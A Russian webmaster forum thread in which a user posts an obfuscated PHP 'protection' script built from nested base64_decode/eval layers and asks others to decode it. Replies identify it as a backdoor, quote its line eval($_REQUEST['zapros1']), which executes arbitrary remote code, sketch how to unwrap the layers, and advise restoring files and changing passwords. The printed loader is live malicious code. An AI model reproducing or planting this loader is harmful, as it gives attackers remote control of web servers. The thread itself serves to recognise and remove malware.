Eval

12
M
На сайте с 25.07.2013
Offline
0
1491

Дорого времени суток:) помогите расшифровать еval, боюсь ставить защиту, не доверяю издателю.

//==============// Код защиты. (Зашифрован с использыванием функции 'eval') //================//

$V225486532="Gh1+cT8zSEVSRkJSRENMMHh1f3hzMEo2KiAlIi4+bBodfnE/fmRkcmM/M0hQUkNMMGRydGJlfmNu

SGR+Y3JIcm9yMEo+PmxydH94NzArc35hKceAx6fGnsevxpXHpzfHpcetx6zGmcaQx6LHqsenOTdhcmVkfnh5NyY5I

yt1ZSlHZXhkYXJjN9W+NyUnJiQrOHN+YSkwLGoaHTNxfntjZUh+eX5jSHJvcionLBodM3F+e2NlSGR8eHV8dkgmSH

ZlZXZuKjU0MDQ1LBodM3F+e2NlSGR8eHV8dkglSHZlZXZuKjA0NTQwLBodM3F+e2NlSHF4ZXp2Y0h2ZWV2bio1OEs

/OWd/Z2s5f2N2dHRyZGRrOXRkZGs5ZXZlazltfmdrOWRme2s5f2N6azl/Y3p7Pkt1OH41LBodM3F+e2NlSHZ7e0h2

ZWV2bio1OD9xfntySGdiY0h0eHljcnljZGt6eGFySGJne3h2c3JzSHF+e3Jrfnl0e2JzcmtlcmZifmVya3JhdntrY

nl7fnl8a3F4Z3J5a3FnYmNka3FgZX5jcmtxfntySHByY0h0eHljcnljZGtxfntya3puZGZ7a3R4Z25renxzfmVrZ3

9na39jdnR0cmRka2R/cnt7SHJvcnRrcnR/eGtlcnl2enI+OH41LBodM3F+e2NlSHF+e3JIdmVldm4qNTUsGh0zcX5

7Y2VIYWF4c0h2ZWV2bio1NSwaHTNxfntyZEhxfntjKj92ZWV2bkh8cm5kPzNIUV5bUkQ+PiwaHX5xPzNxfntyZEhx

fntjTDAnMEo2KjAwPmwaHTNlcmRie2NIdHh5KnR4YnljPzNIUV5bUkQ+LBodM3JIdHh5KicsGh1gf357cj8zZXJkY

ntjSHR4eSkqM3JIdHh5Pmx+cT9nZXJwSHp2Y3R/PzNxfntjZUhxeGV6dmNIdmVldm47fnpne3hzcj81NzU7M0hRXl

tSREwzcX57cmRIcX57Y0wzckh0eHlKSj4+PmwzcX57Y2VIfnl+Y0hyb3IqJiw3dWVydnwsajNySHR4eTw8LGoaHX5

xPzNxfntjZUh+eX5jSHJvcjYqJj5sGh1xYnl0Y354eTdxfntyZEhxfntjSGdleGE/M2d4e3hkdj5sGh1we3h1dns3

M3F+e3JkSHF+e2MsN3B7eHV2ezczcX57Y2VIdnt7SHZlZXZuLDdwe3h1dns3M3F+e2NlSHF+e3JIdmVldm4sGh0zc

X57cmRIcX57Y0hnZXhhKjNIUV5bUkRMM3F+e3JkSHF+e2NMM2d4e3hkdkpKLBodM3Z2ZSpldnlzPyY7Lyc+LBoddH

hnbj8zcX57cmRIcX57Y0hnZXhhTDBjemdIeXZ6cjBKOzNxfntyZEhxfntjcmVIY3pnOTVxfntjcmVIcX57cmRINTk

zdnZlOTU5e3hwNT4sGh0zcX57ckhkf35jdnJ6KnF+e3JIcHJjSHR4eWNyeWNkPzNxfntyZEhxfntjcmVIY3pnOTVx

fntjcmVIcX57cmRINTkzdnZlOTU5e3hwNT4sGh1ieXt+eXw/M3F+e3JkSHF+e2NyZUhjemc5NXF+e2NyZUhxfntyZ

Eg1OTN2dmU5NTl7eHA1PiwaHX5xP2dlcnBIenZjdH8/M3F+e2NlSHZ7e0h2ZWV2bjszcX57ckhkf35jdnJ6PmtrZ2

VycEh6dmN0fz8zcX57Y2VIcX57ckh2ZWV2bjszcX57ckhkf35jdnJ6Pj5sZXJjYmV5NyYsamoaHTN+SHR4eSonLBo

dYH9+e3I/M2VyZGJ7Y0h0eHkpKjN+SHR4eT5sfnE/cX57cmRIcX57Y0hnZXhhPzN+SHR4eT4qKiY+bDNxfntjZUh+

eX5jSHJvciomLDd1ZXJ2fCxqM35IdHh5PDwsamoaHX5xPzNxfntjZUh+eX5jSHJvcioqJj5sc35yPzNxfntjcmVIc

X57ckhydH94PixqahodM3F+e2NlSHp2ZGQqfnpne3hzcj81NzU7M0hQUkM+OTA3MDl+emd7eHNyPzU3NTszSEdYRE

M+OTA3MDl+emd7eHNyPzU3NTszSFRYWFxeUj45MDcwOX56Z3t4c3I/NTc1OzNIRVJGQlJEQz4sGh1+cT9nZXJwSHp

2Y3R/PzNxfntjZUhkfHh1fHZIJkh2ZWV2bjszcX57Y2VIenZkZD5ra2dlcnBIenZjdH8/M3F+e2NlSGR8eHV8dkgl

SHZlZXZuOzNxfntjZUh6dmRkPmtrZ2VycEh6dmN0fz8zcX57Y2VIdnt7SHZlZXZuOzNxfntjZUh6dmRkPmtrZ2Vyc

Eh6dmN0fz8zcX57Y2VIYWF4c0h2ZWV2bjszcX57Y2VIenZkZD4+bDNxfntjZUh+eX5jSHJvciolLGoaHX5xPzNxfn

tjZUh+eX5jSHJvcioqJT5sc35yPzNxfntjcmVIeGR5eGF2SHJ0f3g+LGoaHWpye2RybBodfnE/fmRkcmM/M0hFUkZ

CUkRDTDBtdmdleGQmMEo+PmxyYXZ7PzNIRVJGQlJEQ0wwbXZnZXhkJjBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENM

MG12Z2V4ZCUwSj4+bH55dHtic3JIeHl0cj8zSEVSRkJSRENMMG12Z2V4ZCUwSj4sahodfnE/fmRkcmM/M0hFUkZCU

kRDTDBtdmdleGQkMEo+PmwzcHZkYypxeGdyeT8zSEVSRkJSRENMMG12Z2V4ZCRIJjBKOzVgNT4scWdiY2Q/M3B2ZG

M7M0hFUkZCUkRDTDBtdmdleGQkSCUwSj4scXR7eGRyPzNwdmRjPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V

4ZCMwSj4+bHp4YXJIYmd7eHZzcnNIcX57cj8zSFFeW1JETDBtdmdleGQjSCYwSkwwY3pnSHl2enIwSjszSEVSRkJS

RENMMG12Z2V4ZCNIJTBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V4ZCIwSj4+bGJ5e355fD8zSEVSRkJSR

ENMMG12Z2V4ZCIwSj4samoaHQ==";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlY

TmxOalJmWkdWamIyUmxLQ0pLUmxsNlRYcFJOVTVVYXpKTmFtTTVXVzFHZWxwVVdUQllNbEpzV1RJNWExcFRaMmxYV

npGSFpXeHdWVmRVUWxsTmJFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVVEZOZWtWNFRucFplazlFTVdsWldFNX

NUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMHhTalZaYTJSWFpGTkpjRTk1VWxkT2VsVXdUWHBuZVU5VVRYbFFWMHBvWXp

KVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMVJ6YTFacVozbFBSR2QzVFdwUmQwOVVNV2xaV0U1c1RtcFNa

bHBIVm1waU1sSnNTME5LYVUwd2NISkphV3MzU2taWk5VMXFhelZOZWxVMFRWUmpPVmx0Um5wYVZGa3dXREpTYkZre

U9XdGFVMmRwVjJwT2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0

pLUmxsNVRXcFZNRTlFV1RGTmVrazVTa1paZWsxNlVUVk9WR3N5VFdwamIwcEdXWGxOYWxVd1QwUlpNVTE2U1hCUGV

WSlhUbFJGZUUxNldUVk5ha2t5VUZOU1YwNUVWWHBOVkVVelRtcE5ORXREVWxkTmFra3hUa1JuTWs1VVRYbExWSE05

SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKRll4T0RFME1ESTBNVFE5SnljN1ptOXlLQ1JXTmpFd09Ua

zVPRE01UFRBN0pGWTJNVEE1T1RrNE16azhKRlkxTVRFek5qa3lNalk3SkZZMk1UQTVPVGs0TXprckt5bDdKRll4T0

RFME1ESTBNVFF1UFNSV056VTBNemd5T1RNeUtDZ2tWamd5T0Rnd01qUXdPU2drVmpJeU5UUTROalV6TWxza1ZqWXh

NRGs1T1Rnek9WMHBYakk1TmprME5qRTVPU2twTzMxbGRtRnNLQ1JXTVRneE5EQXlOREUwS1RzPSIpKTs="));

Надеюсь на помощь:) спасибо.

C
На сайте с 04.02.2005
Offline
291
#1

Действительно стремный скрипт

хотя бы уже в этой строке

	if(isset($_REQUEST['zapros1'])){eval($_REQUEST['zapros1']);}
LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#2

Короче, там в этом коде, можно выполнять всё что угодно на вашем сервере.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
M
На сайте с 25.07.2013
Offline
0
#3

Cпасибо:) а можно полностью расшифровать? или хотябы удалить вредоносные коды.. защита действительно работает:)

---------- Добавлено 26.07.2013 в 08:47 ----------

LEOnidUKG:
Короче, там в этом коде, можно выполнять всё что угодно на вашем сервере.

Полный код можно?:)

draff
На сайте с 30.03.2010
Offline
65
#4
Mukpomup:

Полный код можно?:)

Пользуюсь онлайн-сервисом http://base64-encoder-online.waraxe.us/

Хотя можно проверять и на своем компьютере

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
C
На сайте с 04.02.2005
Offline
291
#5
защита действительно работает

От чего и для чего защита?

Для закачки файлов?

А для

$_REQUEST['obhod']!=7259 ????

M
На сайте с 25.07.2013
Offline
0
#6
draff:
Пользуюсь онлайн-сервисом http://base64-encoder-online.waraxe.us/
Хотя можно проверять и на своем компьютере

не фига не понимаю там:) помогите:)

C
На сайте с 04.02.2005
Offline
291
#7
Mukpomup:
не фига не понимаю там помогите

Это не аргумент...

Что не понятно?

Первая переменная (до ;) понадобится в самом конце

Вторую декодируешь, несколько раз

Раз за разом.

До посинения человекопонятного кода


for($VXXXXXXXX=0;$XXXXXXXX<$YYYYYY;$XXXXXXXXXXX++){
$ZZZZZZZZZ.=chr((ord($VVVVVVVVVV[$XXXXXXXXX])));}
firstPR
На сайте с 24.02.2013
Offline
15
#8

99% то что чернота тама, и скорее всего с ваших ресурсов была слита БД и весь контент, а вдобавок возможно ещё и внедрён троянский код в скрипт движка.

В общем если есть что терять, то делайте следующее, меняйте движок (все скриптовые файлы) на исходный, или из бэкапа который был у вас ДО. Меняйте пароли к mysql и ко всему что можно украсть через ваш проект.

M
На сайте с 25.07.2013
Offline
0
#9
Chukcha:
Это не аргумент...
Что не понятно?

Первая переменная (до ;) понадобится в самом конце
Вторую декодируешь, несколько раз
Раз за разом.

До посинения человекопонятного кода

for($VXXXXXXXX=0;$XXXXXXXX<$YYYYYY;$XXXXXXXXXXX++){
$ZZZZZZZZZ.=chr((ord($VVVVVVVVVV[$XXXXXXXXX])));}

мне это не дано:)

---------- Добавлено 26.07.2013 в 09:32 ----------

firstPR:
99% то что чернота тама, и скорее всего с ваших ресурсов была слита БД и весь контент, а вдобавок возможно ещё и внедрён троянский код в скрипт движка.
В общем если есть что терять, то делайте следующее, меняйте движок (все скриптовые файлы) на исходный, или из бэкапа который был у вас ДО. Меняйте пароли к mysql и ко всему что можно украсть через ваш проект.

за 1 минуту пока был скрипт на сервере?

я его удалил после просмотра айболитом

C
На сайте с 04.02.2005
Offline
291
#10
Mukpomup:
мне это не дано

Ну...

Раз такая пьянка... (пятница?)

Что не понятно?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий